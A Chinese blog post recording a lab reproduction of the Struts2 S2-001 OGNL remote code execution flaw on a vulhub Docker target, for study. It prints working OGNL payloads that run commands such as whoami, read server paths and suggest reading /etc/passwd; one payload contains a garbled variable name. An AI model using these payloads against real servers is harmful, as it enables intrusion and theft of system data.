struts2(s2-001)远程代码执行漏洞docker&&vulhub复现
  Qd0Bxrb8H1Yu 2023年11月02日 45 0

本文仅作为个人学习记录及学习交流,禁止用于非法活动 《中华人民共和国网络安全法》

原理

因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行

环境准备

1、Centos 7 2、docker(保证已开启) 3、vulhub靶场

复现

一、服务搭建

1、进入vulhub中s2-001所在目录

/usr/vulhub/struts2/s2-001(根据vulhub个人安装目录自行调整)


2、查看漏洞说明

cat README.zh-cn.md (README.md为英文版)


3、docker容器启动

docker-compose up


4、查看docker进程,确定服务端口

docker ps

struts2(s2-001)远程代码执行漏洞docker&&vulhub复现_漏洞复现

端口为8080

二、漏洞测试

1、访问http://192.168.92.138:8080/

ip:8080

2、输入账号密码,brup抓包

struts2(s2-001)远程代码执行漏洞docker&&vulhub复现_漏洞复现_02

发送到repeterpassword字段改为payload

%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22whoami%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D

发包后返回命令执行结果

POC && EXP

获取tomcat执行路径:

%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

获取Web路径:

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#respnotallow=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

执行任意命令(命令加参数:new java.lang.String[]{"cat","/etc/passwd"}):

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

上一篇: 访问控制列表的应用 下一篇: 双向引入
  1. 分享:
最后一次编辑于 2023年11月08日 0

暂无评论